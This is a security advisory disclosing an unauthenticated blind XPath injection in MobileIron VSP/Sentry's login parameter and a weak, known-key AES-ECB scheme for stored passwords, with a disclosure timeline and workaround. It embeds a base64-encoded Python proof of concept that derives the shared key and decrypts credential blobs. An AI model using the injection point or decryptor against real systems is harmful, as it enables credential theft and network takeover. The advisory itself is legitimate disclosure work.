MobileIron VSP / Sentry Authentication Bypass

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256  
  
  
Matta Consulting - Matta Advisory  
https://www.trustmatta.com  
  
MobileIron Multiple Products  
Authentication Bypass Vulnerability  
  
Advisory ID: MATTA-2013-004  
CVE reference: CVE-2014-1409, CVE-2013-7286  
Affected platforms: VSP and Sentry  
Version: VSP < 5.9.1 and Sentry < 5.0  
Date: 2013-December-19  
Security risk: Critical  
Researcher: Nico Leidecker   
Vendor Status: Patch released  
Vulnerability Disclosure Policy:  
https://www.trustmatta.com/advisories/matta-disclosure-policy-01.txt  
Permanent URL:  
https://www.trustmatta.com/advisories/MATTA-2013-004.txt  
  
=====================================================================  
Description:  
  
During an external penetration test exercise for one of our clients,  
an authentication bypass vulnerability was found in the  
administrative interface of a MobileIron deployment. This ultimately  
allowed us to, gain access to our client's internal network.  
  
The 'j_username' parameter of the script at  
https://<target>/mics/j_spring_security_check is vulnerable to blind  
XPath Injection, allowing an unauthenticated attacker to retrieve the  
underlying XML document.  
  
This XML document is an excerpt of the configuration file of the  
device. It contains obfuscated passwords and, depending on  
configuration, might contain domain credentials and allow the  
attacker to reposition both internally and on any of the attached  
devices.  
This vulnerability has been assigned CVE-2014-1409.  
  
The password obfuscation algorithm is known and has already been  
documented [1]... AES-ECB-PKCS1.5 with a known, shared key. While we  
won't release a full-featured exploit for the vulnerability, we will  
release a PoC to confirm whether the hashes are indeed vulnerable.  
The vendor has confirmed that a stronger encryption method is used  
since release 5.7.  
This vulnerability has been assigned CVE-2013-7286.  
  
[1]   
https://www.hackinparis.com/sites/hackinparis.com/files/MDM-HIP_2013.pdf  
NB: A second insecure encryption scheme is described in [1], MITRE has  
assigned CVE-2013-7287 to that separate vulnerability.  
=====================================================================  
Base64 encoded script to confirm whether the hash provided is  
vulnerable to CVE-2013-7286:  
  
IyEvdXNyL2Jpbi9lbnYgcHl0aG9uCiMKIyAgTW9iaWxlSXJvbiB1c2VzIEFFUy1FQ0ItUEtDUzEu  
NSAod2l0aCBhIGtub3duIGtleSkKIyB0byBzdG9yZSBjcmVkZW50aWFscy4uLiBXaGF0IGEgYnJp  
bGxpYW50IGlkZWEhCiMKIyBUaGlzIHNjcmlwdCBpcyBhYm91dCBjaGVja2luZyB3aGV0aGVyIHRo  
ZSBwcm92aWRlZAojIGhhc2ggaXMgdnVsbmVyYWJsZSB0byBDVkUtMjAxMy03Mjg2IG9yIG5vdC4K  
IwojIE5leHRHZW4kIH4gMjAxMwoKaW1wb3J0IHN5cwppbXBvcnQgYmluYXNjaWkKaW1wb3J0IGhh  
c2hsaWIKaW1wb3J0IHN0cmluZwpmcm9tIENyeXB0by5DaXBoZXIgaW1wb3J0IEFFUwoKaWYgbGVu  
KHN5cy5hcmd2KTwyOiAgICAKIHN5cy5leGl0KCdVc2FnZTogLi9DVkUtMjAxMy03Mjg2LnB5IDxi  
YXNlNjRlbmNvZGVkIGJsb2I  
+JykKCkJTID0gOAp1bnBhZCA9IGxhbWJkYSBzIDogc1swOi1vcmQo  
c1stMV0pXQoKaWYgX19uYW1lX189PSAiX19tYWluX18iOgogICAgIyBHZW5lcmF0ZSB0aGUgbWFz  
dGVyIGtleS4uLgogICAgIyBZZXMuIEl0J3Mgbm90IGEgdHlwbyEKICAgIHBocmFzZSA9ICdIYWt1  
bmEgbWF0YXRhIHdoYXQgYSB3b2RlcmZ1bCBwaHJhc2UnCiAgICBtID0gaGFzaGxpYi5zaGExKCkK  
ICAgIG0udXBkYXRlKHBocmFzZSkKIyBXZSBvbmx5IHdhbnQgdGhlIDE2IGZpcnN0IGJ5dGVzICgx  
MjhiaXQga2V5LCAxNjBiaXQgaGFzaCBmdW5jdGlvbikKICAgIGtleSA9IG0uZGlnZXN0KClbOjE2  
XQogICAgY2lwaGVydGV4dCA9IGJpbmFzY2lpLmEyYl9iYXNlNjQoc3lzLmFyZ3ZbMV0pCiAgICBj  
aXBoZXIgPSBBRVMubmV3KGtleSwgQUVTLk1PREVfRUNCKSAKICAgIHBsYWludGV4dCA9IHVucGFk  
KGNpcGhlci5kZWNyeXB0KGNpcGhlcnRleHQpKQogICAgdnVsbmVyYWJsZSA9IGxlbihwbGFpbnRl  
eHQpID4gMCBhbmQgYWxsKGMgaW4gc3RyaW5nLnByaW50YWJsZSBmb3IgYyBpbiBwbGFpbnRleHQp  
CiAgICBwcmludCAnJXNWVUxORVJBQkxFIFRPIENWRS0yMDEzLTcyODYnICUgKCcnIGlmIHZ1bG5l  
cmFibGUgZWxzZSAnTk9UICcpCg==  
  
=====================================================================  
Impact  
  
Successful exploitation allows an unauthenticated attacker to take  
over the device and potentially any device attached to it as well  
as the Active Directory Domain it might be linked to.  
  
=====================================================================  
Versions affected:  
  
- - Sentry Standalone < 5  
- - VSP < 5.9.1  
  
=====================================================================  
Workaround:  
  
Restrict access to the MICS service (administrative interface) to  
specific hosts:  
MICS Portal -> Security -> Portal ACLs -> System Manager Portal ACL  
  
=====================================================================  
Credits  
  
This vulnerability was discovered by Nico Leidecker from Matta  
Consulting.  
  
=====================================================================  
History  
  
19-12-13 initial discovery  
30-12-13 client has mitigated the vulnerability  
30-12-13 initial attempt to contact the vendor  
30-12-13 reply from the vendor  
31-12-13 a draft of this advisory is sent to the vendor  
03-01-14 vendor can't reproduce / ask for more details  
03-01-14 more details are sent  
07-01-14 vendor recognize that there is a bug but dissmisses it as a  
security vulnerability  
07-01-14 more details are sent  
14-01-14 a week lapsed, no reply... we chase it up  
14-01-14 vendor reply: they're working on a response  
15-01-14 vendor respond: reclassify the bug as a security issue,  
indicate that they indend on fixing the bug in the Q1 release,  
provide a workaround and ask for us to hold on releasing the  
advisory until the release is published  
15-01-14 we agree to a deadline extension, send the CVEs MITRE has  
assigned  
...  
19-02-14 vendor release 5.9.1 (but doesn't let us know)  
...  
31-03-14 vendor indicate that the release of VSP 6 is delayed but   
the bugs have been fixed in 5.9.1  
02-04-14 release of this advisory  
  
=====================================================================  
About Matta  
  
Matta is a privately held company with Headquarters in London, and a  
European office in Amsterdam. Established in 2001, Matta operates  
in Europe, Asia, the Middle East and North America using a respected  
team of senior consultants. Matta is an accredited provider of  
Tiger Scheme training and conducts regular research.  
  
https://www.trustmatta.com  
https://www.trustmatta.com/training.html  
https://www.trustmatta.com/network-penetration-testing.html  
https://www.trustmatta.com/vulnerability-assessment.html  
  
=====================================================================  
Disclaimer and Copyright  
  
Copyright (c) 2014 Matta Consulting Limited. All rights reserved.  
This advisory may be distributed as long as its distribution is  
free-of-charge and proper credit is given.  
  
The information provided in this advisory is provided "as is" without  
warranty of any kind. Matta Consulting disclaims all warranties,  
either express or implied, including the warranties of  
merchantability and fitness for a particular purpose. In no event  
shall Matta Consulting or its suppliers be liable for any damages  
whatsoever including direct, indirect, incidental, consequential,  
loss of business profits or special damages, even if Matta  
Consulting or its suppliers have been advised of the possibility  
of such damages.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1  
  
iQEcBAEBCAAGBQJTO/cTAAoJELJDQjn66kB28ysIAILzCnK9mifpyjswSKOJPzUi  
EgcexJdVIjWZf32gLi202YCHJkiIXNGfG390HrWMQZZWU2l+lEb4cMb4NH8xsjzg  
06GbBnrRzBcE35dhO3C0aHuPFh7MRQzbRM4mVyPg1ViUlM7Lb9kQBoD6xdS4gZ09  
SaNAdm44WrvGiFAO8yuT56cjHZ1ZYfr+iHQjxY7UIrvmzKKSvMnvv13Fy2CIrRPe  
zk7QLfyxszbR/eo+HOroNhHAPnfl8Mu0Y/1ihFTJF96irCPuejR7v9WzqlJxRfZB  
ZQJCKnz1c9cCDPxNY9GliBKT0FlkLX+IOVP/TF40jT7Zk6f+cWgOXcghlgnyunA=  
=XxBr  
-----END PGP SIGNATURE-----  
`